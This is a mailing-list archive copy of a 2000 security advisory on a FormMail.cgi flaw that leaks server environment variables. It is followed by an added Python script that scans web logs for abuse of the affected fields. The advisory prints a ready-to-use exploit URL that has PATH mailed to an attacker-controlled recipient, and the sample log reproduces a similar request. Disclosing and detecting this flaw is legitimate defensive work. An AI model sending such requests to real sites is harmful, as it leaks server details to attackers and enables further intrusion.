Bugtraq mailing list archives
Black Watch Labs Vulnerability Alert
From: blackwatchlabs () PERFECTOTECH COM (Black Watch Labs)
Date: Wed, 10 May 2000 16:11:23 -0700
Dear Security Professional,

The following vulnerability: "Environment and setup variables can be viewed through FormMail script" is in the text of the message below and has just been posted to the Black Watch Labs Web site at http://www.perfectotech.com/blackwatchlabs/

Thank you,
Black Watch Labs

If you wish to unsubscribe to this Black Watch Labs email update, please click on reply and type the word "Unsubscribe" in the subject line.

--------------------------------------------------------------------------------

Environment and setup variables can be viewed through FormMail script

Perfecto's Black Watch Labs Advisory BWL 00-06 (May 10, 2000)

Name: Environment and setup variables can be viewed through FormMail script
Black Watch Labs ID: BWL 00-06
Date Released: May 10, 2000
Products affected: Matt's FormMail.cgi
Number of affected sites: It is estimated that there are thousands of pages containing links to the formmail script.
Category: Application (HTML): modification of parameters, debug options.

Summary:
The script allows several environment variables to be viewed by the attacker, who can gain useful information on the site, making further attacks more feasible.

Analysis:
FormMail contains a debug field named env_report, whose value is a list of environment variables (accessed via $ENV[name]) separated by commas. These variables (if they exist) are embedded into the message body. Furthermore, the script does not check the integrity of the recipient, thus the recipient field can be changed, so the message will be sent to the attacker's account. Thus the attacker can gain the environment information.

Exploits:
FormMail: assume the URL for the script is http://www.formmail.site/cgi-bin/formmail.cgi, then to get the PATH environment parameter (i.e. to send it to account: attacker () attacker site), all there is to do is to request the following URL:

http://www.formmail.site/cgi-bin/formmail.cgi?env_report=PATH&recipient=attacker () attacker site&required=&firstname=&lastname=&email=&message=&Submit=Submit

Vendor Patch or workaround:
None submitted at the time of this release.

References and Links:
Matt's Script Archive (FormMail): http://www.worldwidemart.com/scripts/formmail.shtml

About Black Watch Labs (www.perfectotech.com/blackwatchlabs/)
Black Watch Labs is a research group operated by Perfecto Technologies Inc., leader in Web application security management. Black Watch Labs was established in order to further the knowledge of the Internet community in the arena of Web application security management. Black Watch Labs publishes security advisories regularly, which are maintained at http://www.perfectotech.com/blackwatchlabs/, and are also posted to relevant security lists and websites. Black Watch Labs also operates a Web application security mailing list, which can be subscribed to at http://www.perfectotech.com/blackwatchlabs/. For more info about Black Watch Labs and Web Application Security Management, please call (408) 855-9500 or email BlackWatchLabs () perfectotech com

About Perfecto Technologies (www.perfectotech.com)
Founded in 1997 and headquartered in Santa Clara, Calif., Perfecto Technologies pioneered the market for Web Application Security Management software. AppShield, Perfecto Technologies' flagship product offering, is the first to provide extreme security for customer-facing applications in dynamic Web site environments. Perfecto Technologies has customers in many sectors, including banking, etailing, finance, government, and healthcare. Privately held, Perfecto Technologies is funded by blue-chip venture capital firms and industry leaders, including Sequoia Capital, Walden, and Intel Corporation. More information about Perfecto Technologies may be obtained by visiting the Company's Website at www.perfectotech.com or by calling the Company directly at (408) 855-9500.

Copyright © 1997-2000 Perfecto Technologies LTD. All rights reserved. Permission is hereby granted to reproduce and distribute the application security alerts herein in their entirety, provided the information, this notice and all other Perfecto Technologies marks remain intact.

Specific Limitations on Use of the Black Watch Labs Advisories
THIS ADVISORY INCLUDES INFORMATION WHICH WILL ILLUSTRATE CERTAIN SECURITY RISKS AND ISSUES ASSOCIATED WITH SITES ON THE INTERNET, INCLUDING, POTENTIALLY, YOUR SITE. YOU AGREE THAT YOUR VIEWING OF THIS ADVISORY IS SOLELY FOR THE PURPOSES OF UNDERSTANDING THESE RISKS AND ISSUES WITH RESPECT TO YOUR SITE AND THE PRODUCTS AND SERVICES OFFERED BY PERFECTO TECHNOLOGIES. YOU AGREE NOT TO USE ANY INFORMATION DISCLOSED TO YOU FOR ANY IMPROPER OR ILLEGAL PURPOSE, INCLUDING TO VIOLATE THE SECURITY OF ANY OTHER PERSON'S SITE. YOU ARE EXPLICITLY WARNED THAT THE USE FOR ANY IMPROPER PURPOSE OF INFORMATION DISCLOSED TO YOU COULD SUBJECT YOU TO CIVIL AND CRIMINAL LIABILITY IN THE UNITED STATES AND OTHER COUNTRIES.

NO WARRANTY
Any material furnished by Perfecto Technologies is furnished on an "as is" basis and may change without notice. Perfecto Technologies makes no warranties of any kind, either expressed or implied as to any matter including but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Neither does Perfecto Technologies make any warranty of any kind with respect to freedom from patent, trademark or copyright infringement. In no event shall Perfecto Technologies be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
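
Added example, not part of the Black Watch Labs advisory or of FormMail itself: a log check a site operator could run to find requests that use the two fields the Analysis describes, env_report and recipient. The allowlists (SAFE_ENV, ALLOWED_RECIPIENT_DOMAINS), the example.org domain and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumptions (not from the advisory): variables a form may legitimately
# report, and the domains this site's forms are meant to mail to.
SAFE_ENV = {"REMOTE_HOST", "REMOTE_ADDR", "HTTP_USER_AGENT"}
ALLOWED_RECIPIENT_DOMAINS = {"example.org"}

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def audit_request(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/formmail.cgi"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    # env_report is a comma-separated list of environment variable names.
    for value in params.get("env_report", []):
        names = {n.strip() for n in value.split(",") if n.strip()}
        extra = sorted(names - SAFE_ENV)
        if extra:
            findings.append("env_report requests " + ",".join(extra))
    # The script does not validate recipient, so check it against the allowlist.
    for value in params.get("recipient", []):
        for addr in (a.strip() for a in value.split(",")):
            domain = addr.rpartition("@")[2].lower()
            if addr and domain not in ALLOWED_RECIPIENT_DOMAINS:
                findings.append("recipient outside allowlist: " + addr)
    return findings

def scan(log_lines):
    """Yield (line_number, findings) for each log line that trips a check."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        findings = audit_request(match.group(1)) if match else []
        if findings:
            yield number, findings

# Constructed Common Log Format lines (documentation addresses and domains).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/May/2000:16:20:01 -0700] "GET /cgi-bin/formmail.cgi?recipient=webmaster@example.org&email=a%40example.org HTTP/1.0" 200 512',
    '192.0.2.66 - - [10/May/2000:16:21:09 -0700] "GET /cgi-bin/formmail.cgi?env_report=PATH&recipient=someone%40example.net HTTP/1.0" 200 498',
    '192.0.2.10 - - [10/May/2000:16:22:30 -0700] "GET /index.html HTTP/1.0" 200 1043',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

Access logs record only the query string, so form submissions sent by POST carry these fields in the request body and will not show up in this check.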